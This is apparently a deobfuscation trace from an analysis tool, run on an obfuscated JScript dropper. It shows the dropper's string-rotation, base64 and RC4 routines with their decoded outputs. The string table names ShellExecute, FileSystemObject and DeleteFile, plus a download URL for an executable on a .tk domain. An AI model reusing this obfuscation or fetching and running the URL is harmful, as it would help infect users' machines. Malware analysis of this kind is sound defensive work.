                                                                                                        • _0x3974() ➔ ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW
                                                                                                        • _0x3974() ➔ ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW
                                                                                                        • _0x3974() ➔ ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW
                                                                                                        2
                                                                                                        return _0x5099 =
                                                                                                          3
                                                                                                          function (_0xe99d3f, _0x318392) {
                                                                                                          • _0x5099(244,"dOyh") ➔ "]\x0e\xe58\xef"
                                                                                                          • _0x5099(213,"SewZ") ➔ undefined
                                                                                                          • _0x5099(244,"dOyh") ➔ "\xba\x9e\xda\xb9\xa9\xfdl\xa8\xf12;D"
                                                                                                          • _0x5099(213,"SewZ") ➔ "\x02RvYjD\x89\x91\xc3\xec\xe0c"
                                                                                                          • _0x5099(266,"SewZ") ➔ "m\x89Y\xb8\."
                                                                                                          • _0x5099(219,")E2i") ➔ "\x0b1\xd1E\xa5\x9e5\xf3\xaf"
                                                                                                          • _0x5099(255,"CZq%") ➔ undefined
                                                                                                          • _0x5099(244,"dOyh") ➔ "\xf0\x0f,\xc6\xb1\xae\x95\xbf\xadZ;C"
                                                                                                          • _0x5099(213,"SewZ") ➔ "\xfd\xdbYt\xbe\x96"
                                                                                                          • _0x5099(266,"SewZ") ➔ "8|\x0e\xf1\xed\xd1x"
                                                                                                          4
                                                                                                          _0xe99d3f = _0xe99d3f - 0xc8;
                                                                                                            5
                                                                                                            var _0x59ecb7 = _0x3974d[_0xe99d3f];
                                                                                                              6
                                                                                                              if ( _0x5099['GLbovs'] === undefined )
                                                                                                                7
                                                                                                                {
                                                                                                                  8
                                                                                                                  var _0x12b176 = function (_0x5c0ef3) {
                                                                                                                  • _0x12b176("AXxcQSkOWRG") ➔ "k\x15\xaa\xa8\xb8"
                                                                                                                  • _0x12b176("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=") ➔ undefined
                                                                                                                  • _0x12b176("WOZcHCkvkCo+WOXZnuxcKKbM") ➔ "\x8c\x85\x95)\xfe\x8cs5E\x92@f"
                                                                                                                  • _0x12b176("w1vrmSoRW7VdJCkJWOVdGaldVq") ➔ "[UQ2\xeb\xfb\xcd\xa3\x8b\xc0\x02\xfd"
                                                                                                                  • _0x12b176("nmkoFSotW53cKq") ➔ "4\x8e~\xd3\xdd\x91"
                                                                                                                  • _0x12b176("EMpdGSkmdSoXsCk+W6u") ➔ "zc\xc2\x8c\x0e\xf1I\xbe\xe5"
                                                                                                                  • _0x12b176("https://tgc8x.tk/tt/VNZVNCXKKJSF.exe") ➔ undefined
                                                                                                                  • _0x12b176("W4yuy1BdPSoFWOOIgCo6qge") ➔ "\xc6\x14cV\xe6\xdf\x8a"\x19\xfa@a"
                                                                                                                  • _0x12b176("WQtdNh4FpYK") ➔ "\xa4\xdc~\x1f?)"
                                                                                                                  • _0x12b176("yxSPWPPSBJW") ➔ "a{)\x9aln<"
                                                                                                                  9
                                                                                                                  var _0x14b3e9 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';
                                                                                                                    10
                                                                                                                    var _0x4b257a = '', _0x33ffaf = '';
                                                                                                                      11
                                                                                                                      for ( var _0x376b0b = 0x0, _0x404151, _0x27f080, _0x17fea0 = 0x0 ; _0x27f080 = _0x5c0ef3['charAt'] ( _0x17fea0 ++ ) ; ~ _0x27f080 && ( _0x404151 = _0x376b0b % 0x4 ? _0x404151 * 0x40 + _0x27f080 : _0x27f080, _0x376b0b ++ % 0x4 ) ? _0x4b257a += String['fromCharCode'] ( 0xff & _0x404151 >> ( - 0x2 * _0x376b0b & 0x6 ) ) : 0x0 )
                                                                                                                        12
                                                                                                                        {
                                                                                                                          13
                                                                                                                          _0x27f080 = _0x14b3e9['indexOf'] ( _0x27f080 );
                                                                                                                            14
                                                                                                                            }
                                                                                                                              15
                                                                                                                              for ( var _0x35b3aa = 0x0, _0x366407 = _0x4b257a['length'] ; _0x35b3aa < _0x366407 ; _0x35b3aa ++ )
                                                                                                                                16
                                                                                                                                {
                                                                                                                                  17
                                                                                                                                  _0x33ffaf += '%' + ( '00' + _0x4b257a['charCodeAt'] ( _0x35b3aa ) ['toString'] ( 0x10 ) )['slice'] ( - 0x2 );
                                                                                                                                    18
                                                                                                                                    }
                                                                                                                                      19
                                                                                                                                      return decodeURIComponent ( _0x33ffaf );
                                                                                                                                      • decodeURIComponent("%6b%15%c2%aa%c2%a8%c2%b8") ➔ "k\x15\xaa\xa8\xb8"
                                                                                                                                      • decodeURIComponent("%00%10%83%10%51%87%20%92%8b%30%d3%8f%41%14%93%51%55%97%61%96%9b%71%d7%9f%82%18%a3%92%59%a7%a2%9a%ab%b2%db%af%c3%1c%b3%d3%5d%b7%e3%9e%bb%f3%df%bf") ➔ undefined
                                                                                                                                      • decodeURIComponent("%c2%8c%c2%85%c2%95%29%c3%be%c2%8c%73%35%45%c2%92%40%66") ➔ "\x8c\x85\x95)\xfe\x8cs5E\x92@f"
                                                                                                                                      • decodeURIComponent("%5b%55%51%32%c3%ab%c3%bb%c3%8d%c2%a3%c2%8b%c3%80%02%c3%bd") ➔ "[UQ2\xeb\xfb\xcd\xa3\x8b\xc0\x02\xfd"
                                                                                                                                      • decodeURIComponent("%34%c2%8e%7e%c3%93%c3%9d%c2%91") ➔ "4\x8e~\xd3\xdd\x91"
                                                                                                                                      • decodeURIComponent("%7a%63%c3%82%c2%8c%0e%c3%b1%49%c2%be%c3%a5") ➔ "zc\xc2\x8c\x0e\xf1I\xbe\xe5"
                                                                                                                                      • decodeURIComponent("%1d%34%cf%4b%ff%d3%18%2f%17%4c%af%d3%4f%fb%e7%ce%f9%dc%c6%49%23%b1%f1%17") ➔ undefined
                                                                                                                                      • decodeURIComponent("%c3%86%14%63%56%c3%a6%c3%9f%c2%8a%22%19%c3%ba%40%61") ➔ "\xc6\x14cV\xe6\xdf\x8a"\x19\xfa@a"
                                                                                                                                      • decodeURIComponent("%c2%a4%c3%9c%7e%1f%3f%29") ➔ "\xa4\xdc~\x1f?)"
                                                                                                                                      • decodeURIComponent("%61%7b%29%c2%9a%6c%6e%3c") ➔ "a{)\x9aln<"
                                                                                                                                      20
                                                                                                                                      };
                                                                                                                                        21
                                                                                                                                        var _0x50992b = function (_0x13f8d0, _0xbb7100) {
                                                                                                                                        • function (_0xe99d3f, _0x318392).eDkGFb("AXxcQSkOWRG","dOyh") ➔ "]\x0e\xe58\xef"
                                                                                                                                        • function (_0xe99d3f, _0x318392).eDkGFb("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=","SewZ") ➔ undefined
                                                                                                                                        • function (_0xe99d3f, _0x318392).eDkGFb("WOZcHCkvkCo+WOXZnuxcKKbM","dOyh") ➔ "\xba\x9e\xda\xb9\xa9\xfdl\xa8\xf12;D"
                                                                                                                                        • function (_0xe99d3f, _0x318392).eDkGFb("w1vrmSoRW7VdJCkJWOVdGaldVq","SewZ") ➔ "\x02RvYjD\x89\x91\xc3\xec\xe0c"
                                                                                                                                        • function (_0xe99d3f, _0x318392).eDkGFb("nmkoFSotW53cKq","SewZ") ➔ "m\x89Y\xb8\."
                                                                                                                                        • function (_0xe99d3f, _0x318392).eDkGFb("EMpdGSkmdSoXsCk+W6u",")E2i") ➔ "\x0b1\xd1E\xa5\x9e5\xf3\xaf"
                                                                                                                                        • function (_0xe99d3f, _0x318392).eDkGFb("https://tgc8x.tk/tt/VNZVNCXKKJSF.exe","CZq%") ➔ undefined
                                                                                                                                        • function (_0xe99d3f, _0x318392).eDkGFb("W4yuy1BdPSoFWOOIgCo6qge","dOyh") ➔ "\xf0\x0f,\xc6\xb1\xae\x95\xbf\xadZ;C"
                                                                                                                                        • function (_0xe99d3f, _0x318392).eDkGFb("WQtdNh4FpYK","SewZ") ➔ "\xfd\xdbYt\xbe\x96"
                                                                                                                                        • function (_0xe99d3f, _0x318392).eDkGFb("yxSPWPPSBJW","SewZ") ➔ "8|\x0e\xf1\xed\xd1x"
                                                                                                                                        22
                                                                                                                                        var _0x16801f = [], _0x374a29 = 0x0, _0x319ed0, _0x3b90fe = '';
                                                                                                                                          23
                                                                                                                                          _0x13f8d0 = _0x12b176 ( _0x13f8d0 );
                                                                                                                                          • _0x12b176("AXxcQSkOWRG") ➔ "k\x15\xaa\xa8\xb8"
                                                                                                                                          • _0x12b176("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=") ➔ undefined
                                                                                                                                          • _0x12b176("WOZcHCkvkCo+WOXZnuxcKKbM") ➔ "\x8c\x85\x95)\xfe\x8cs5E\x92@f"
                                                                                                                                          • _0x12b176("w1vrmSoRW7VdJCkJWOVdGaldVq") ➔ "[UQ2\xeb\xfb\xcd\xa3\x8b\xc0\x02\xfd"
                                                                                                                                          • _0x12b176("nmkoFSotW53cKq") ➔ "4\x8e~\xd3\xdd\x91"
                                                                                                                                          • _0x12b176("EMpdGSkmdSoXsCk+W6u") ➔ "zc\xc2\x8c\x0e\xf1I\xbe\xe5"
                                                                                                                                          • _0x12b176("https://tgc8x.tk/tt/VNZVNCXKKJSF.exe") ➔ undefined
                                                                                                                                          • _0x12b176("W4yuy1BdPSoFWOOIgCo6qge") ➔ "\xc6\x14cV\xe6\xdf\x8a"\x19\xfa@a"
                                                                                                                                          • _0x12b176("WQtdNh4FpYK") ➔ "\xa4\xdc~\x1f?)"
                                                                                                                                          • _0x12b176("yxSPWPPSBJW") ➔ "a{)\x9aln<"
                                                                                                                                          24
                                                                                                                                          var _0x2e4578;
                                                                                                                                            25
                                                                                                                                            for ( _0x2e4578 = 0x0 ; _0x2e4578 < 0x100 ; _0x2e4578 ++ )
                                                                                                                                              26
                                                                                                                                              {
                                                                                                                                                27
                                                                                                                                                _0x16801f[_0x2e4578] = _0x2e4578;
                                                                                                                                                  28
                                                                                                                                                  }
                                                                                                                                                    29
                                                                                                                                                    for ( _0x2e4578 = 0x0 ; _0x2e4578 < 0x100 ; _0x2e4578 ++ )
                                                                                                                                                      30
                                                                                                                                                      {
                                                                                                                                                        31
                                                                                                                                                        _0x374a29 = ( _0x374a29 + _0x16801f[_0x2e4578] + _0xbb7100['charCodeAt'] ( _0x2e4578 % _0xbb7100['length'] ) ) % 0x100, _0x319ed0 = _0x16801f[_0x2e4578], _0x16801f[_0x2e4578] = _0x16801f[_0x374a29], _0x16801f[_0x374a29] = _0x319ed0;
                                                                                                                                                          32
                                                                                                                                                          }
                                                                                                                                                            33
                                                                                                                                                            _0x2e4578 = 0x0, _0x374a29 = 0x0;
                                                                                                                                                              34
                                                                                                                                                              for ( var _0x10039f = 0x0 ; _0x10039f < _0x13f8d0['length'] ; _0x10039f ++ )
                                                                                                                                                                35
                                                                                                                                                                {
                                                                                                                                                                  36
                                                                                                                                                                  _0x2e4578 = ( _0x2e4578 + 0x1 ) % 0x100, _0x374a29 = ( _0x374a29 + _0x16801f[_0x2e4578] ) % 0x100, _0x319ed0 = _0x16801f[_0x2e4578], _0x16801f[_0x2e4578] = _0x16801f[_0x374a29], _0x16801f[_0x374a29] = _0x319ed0, _0x3b90fe += String['fromCharCode'] ( _0x13f8d0['charCodeAt'] ( _0x10039f ) ^ _0x16801f[( _0x16801f[_0x2e4578] + _0x16801f[_0x374a29] ) % 0x100] );
                                                                                                                                                                    37
                                                                                                                                                                    }
                                                                                                                                                                      38
                                                                                                                                                                      return _0x3b90fe;
                                                                                                                                                                        39
                                                                                                                                                                        };
                                                                                                                                                                          40
                                                                                                                                                                          _0x5099['eDkGFb'] = _0x50992b, _0x304024 = arguments, _0x5099['GLbovs'] = ! ! [];
                                                                                                                                                                            41
                                                                                                                                                                            }
                                                                                                                                                                              42
                                                                                                                                                                              var _0x1bce3b = _0x3974d[0x0], _0x199af3 = _0xe99d3f + _0x1bce3b, _0x2d5575 = _0x304024[_0x199af3];
                                                                                                                                                                                43
                                                                                                                                                                                return ! _0x2d5575 ? ( _0x5099['IyeLFh'] === undefined && ( _0x5099['IyeLFh'] = ! ! [] ), _0x59ecb7 = _0x5099['eDkGFb'] ( _0x59ecb7, _0x318392 ), _0x304024[_0x199af3] = _0x59ecb7 ) : _0x59ecb7 = _0x2d5575, _0x59ecb7;
                                                                                                                                                                                • function (_0xe99d3f, _0x318392).eDkGFb("AXxcQSkOWRG","dOyh") ➔ "]\x0e\xe58\xef"
                                                                                                                                                                                • function (_0xe99d3f, _0x318392).eDkGFb("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=","SewZ") ➔ undefined
                                                                                                                                                                                • function (_0xe99d3f, _0x318392).eDkGFb("WOZcHCkvkCo+WOXZnuxcKKbM","dOyh") ➔ "\xba\x9e\xda\xb9\xa9\xfdl\xa8\xf12;D"
                                                                                                                                                                                • function (_0xe99d3f, _0x318392).eDkGFb("w1vrmSoRW7VdJCkJWOVdGaldVq","SewZ") ➔ "\x02RvYjD\x89\x91\xc3\xec\xe0c"
                                                                                                                                                                                • function (_0xe99d3f, _0x318392).eDkGFb("nmkoFSotW53cKq","SewZ") ➔ "m\x89Y\xb8\."
                                                                                                                                                                                • function (_0xe99d3f, _0x318392).eDkGFb("EMpdGSkmdSoXsCk+W6u",")E2i") ➔ "\x0b1\xd1E\xa5\x9e5\xf3\xaf"
                                                                                                                                                                                • function (_0xe99d3f, _0x318392).eDkGFb("https://tgc8x.tk/tt/VNZVNCXKKJSF.exe","CZq%") ➔ undefined
                                                                                                                                                                                • function (_0xe99d3f, _0x318392).eDkGFb("W4yuy1BdPSoFWOOIgCo6qge","dOyh") ➔ "\xf0\x0f,\xc6\xb1\xae\x95\xbf\xadZ;C"
                                                                                                                                                                                • function (_0xe99d3f, _0x318392).eDkGFb("WQtdNh4FpYK","SewZ") ➔ "\xfd\xdbYt\xbe\x96"
                                                                                                                                                                                • function (_0xe99d3f, _0x318392).eDkGFb("yxSPWPPSBJW","SewZ") ➔ "8|\x0e\xf1\xed\xd1x"
                                                                                                                                                                                44
                                                                                                                                                                                }, _0x5099 ( _0x304024, _0x5125dd );
                                                                                                                                                                                  45
                                                                                                                                                                                  }
                                                                                                                                                                                    46
                                                                                                                                                                                    var _0x445216 = _0x5099, _0x56566c = _0xe99d;
                                                                                                                                                                                      47
                                                                                                                                                                                      ( function (_0x33d5a0, _0x4566fe) {
                                                                                                                                                                                      • (function _0x3974(),418135) ➔ undefined
                                                                                                                                                                                      • (function _0x3974(),418135) ➔ undefined
                                                                                                                                                                                      48
                                                                                                                                                                                      var _0x29007c = _0xe99d, _0x24698b = _0x5099, _0x529399 = _0x33d5a0 ( );
                                                                                                                                                                                      • _0x3974() ➔ dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB
                                                                                                                                                                                      49
                                                                                                                                                                                      while (! ! [ ] )
                                                                                                                                                                                        50
                                                                                                                                                                                        {
                                                                                                                                                                                          51
                                                                                                                                                                                          try
                                                                                                                                                                                            52
                                                                                                                                                                                            {
                                                                                                                                                                                              53
                                                                                                                                                                                              var _0x529eac = - parseInt ( _0x24698b ( 0xf4, 'dOyh' ) ) / 0x1 + parseInt ( _0x29007c ( 0xea ) ) / 0x2 * ( - parseInt ( _0x29007c ( 0x104 ) ) / 0x3 ) + parseInt ( _0x24698b ( 0xd5, 'SewZ' ) ) / 0x4 + - parseInt ( _0x24698b ( 0x10a, 'SewZ' ) ) / 0x5 + parseInt ( _0x29007c ( 0xe9 ) ) / 0x6 + - parseInt ( _0x24698b ( 0xdb, ')E2i' ) ) / 0x7 * ( parseInt ( _0x24698b ( 0xff, 'CZq%' ) ) / 0x8 ) + parseInt ( _0x29007c ( 0x105 ) ) / 0x9 * ( parseInt ( _0x29007c ( 0xf6 ) ) / 0xa );
                                                                                                                                                                                              • _0x5099(244,"dOyh") ➔ "]\x0e\xe58\xef"
                                                                                                                                                                                              • parseInt("]\x0e\xe58\xef") ➔ NaN
                                                                                                                                                                                              • _0xe99d(234) ➔ "DeleteFile"
                                                                                                                                                                                              • parseInt("DeleteFile") ➔ NaN
                                                                                                                                                                                              • _0xe99d(260) ➔ "push"
                                                                                                                                                                                              • parseInt("push") ➔ NaN
                                                                                                                                                                                              • _0x5099(213,"SewZ") ➔ undefined
                                                                                                                                                                                              • _0x5099(244,"dOyh") ➔ "\xba\x9e\xda\xb9\xa9\xfdl\xa8\xf12;D"
                                                                                                                                                                                              • parseInt("\xba\x9e\xda\xb9\xa9\xfdl\xa8\xf12;D") ➔ NaN
                                                                                                                                                                                              • _0xe99d(234) ➔ "W4ZdJrRdRue"
                                                                                                                                                                                              • parseInt("W4ZdJrRdRue") ➔ NaN
                                                                                                                                                                                              • _0xe99d(260) ➔ "76392yWuOtG"
                                                                                                                                                                                              • parseInt("76392yWuOtG") ➔ 76392
                                                                                                                                                                                              • _0x5099(213,"SewZ") ➔ "\x02RvYjD\x89\x91\xc3\xec\xe0c"
                                                                                                                                                                                              • parseInt("\x02RvYjD\x89\x91\xc3\xec\xe0c") ➔ NaN
                                                                                                                                                                                              • _0x5099(266,"SewZ") ➔ "m\x89Y\xb8\."
                                                                                                                                                                                              • parseInt("m\x89Y\xb8\.") ➔ NaN
                                                                                                                                                                                              • _0xe99d(233) ➔ "DeleteFile"
                                                                                                                                                                                              • parseInt("DeleteFile") ➔ NaN
                                                                                                                                                                                              • _0x5099(219,")E2i") ➔ "\x0b1\xd1E\xa5\x9e5\xf3\xaf"
                                                                                                                                                                                              • parseInt("\x0b1\xd1E\xa5\x9e5\xf3\xaf") ➔ 1
                                                                                                                                                                                              • _0x5099(255,"CZq%") ➔ undefined
                                                                                                                                                                                              • _0x5099(244,"dOyh") ➔ "\xf0\x0f,\xc6\xb1\xae\x95\xbf\xadZ;C"
                                                                                                                                                                                              • parseInt("\xf0\x0f,\xc6\xb1\xae\x95\xbf\xadZ;C") ➔ NaN
                                                                                                                                                                                              • _0xe99d(234) ➔ "421620Dulpsf"
                                                                                                                                                                                              • parseInt("421620Dulpsf") ➔ 421620
                                                                                                                                                                                              • _0xe99d(260) ➔ "W73dVr7dRxtcHSkIW4xcK27cLSoWWOa"
                                                                                                                                                                                              • parseInt("W73dVr7dRxtcHSkIW4xcK27cLSoWWOa") ➔ NaN
                                                                                                                                                                                              • _0x5099(213,"SewZ") ➔ "\xfd\xdbYt\xbe\x96"
                                                                                                                                                                                              • parseInt("\xfd\xdbYt\xbe\x96") ➔ NaN
                                                                                                                                                                                              • _0x5099(266,"SewZ") ➔ "8|\x0e\xf1\xed\xd1x"
                                                                                                                                                                                              • parseInt("8|\x0e\xf1\xed\xd1x") ➔ 8
                                                                                                                                                                                              • _0xe99d(233) ➔ "W4ZdJrRdRue"
                                                                                                                                                                                              • parseInt("W4ZdJrRdRue") ➔ NaN
                                                                                                                                                                                              • _0x24698b(219,")E2i") ➔ undefined
                                                                                                                                                                                              • _0x24698b(244,"dOyh") ➔ "36281KcZnqJ"
                                                                                                                                                                                              • parseInt("36281KcZnqJ") ➔ 36281
                                                                                                                                                                                              • _0xe99d(234) ➔ "282elZIVv"
                                                                                                                                                                                              • parseInt("282elZIVv") ➔ 282
                                                                                                                                                                                              • _0xe99d(260) ➔ "5991OPUtAM"
                                                                                                                                                                                              • parseInt("5991OPUtAM") ➔ 5991
                                                                                                                                                                                              • _0x24698b(213,"SewZ") ➔ "356528XRGOsP"
                                                                                                                                                                                              • parseInt("356528XRGOsP") ➔ 356528
                                                                                                                                                                                              • _0x24698b(266,"SewZ") ➔ "3057435mbhznI"
                                                                                                                                                                                              • parseInt("3057435mbhznI") ➔ 3057435
                                                                                                                                                                                              • _0x29007c(233) ➔ "421620Dulpsf"
                                                                                                                                                                                              • parseInt("421620Dulpsf") ➔ 421620
                                                                                                                                                                                              • _0x24698b(219,")E2i") ➔ "2016707DEhGJz"
                                                                                                                                                                                              • parseInt("2016707DEhGJz") ➔ 2016707
                                                                                                                                                                                              • _0x24698b(255,"CZq%") ➔ "8ApAyti"
                                                                                                                                                                                              • parseInt("8ApAyti") ➔ 8
                                                                                                                                                                                              • _0x29007c(261) ➔ "13285611Ofkcqp"
                                                                                                                                                                                              • parseInt("13285611Ofkcqp") ➔ 13285611
                                                                                                                                                                                              • _0x29007c(246) ➔ "10MQXdOq"
                                                                                                                                                                                              • parseInt("10MQXdOq") ➔ 10
                                                                                                                                                                                              54
                                                                                                                                                                                              if ( _0x529eac === _0x4566fe )
                                                                                                                                                                                                55
                                                                                                                                                                                                break ;
                                                                                                                                                                                                  56
                                                                                                                                                                                                  else
                                                                                                                                                                                                    57
                                                                                                                                                                                                    _0x529399['push'] ( _0x529399['shift'] ( ) );
                                                                                                                                                                                                      58
                                                                                                                                                                                                      }
                                                                                                                                                                                                        59
                                                                                                                                                                                                        catch ( _0x1ed55f )
                                                                                                                                                                                                          60
                                                                                                                                                                                                          {
                                                                                                                                                                                                            61
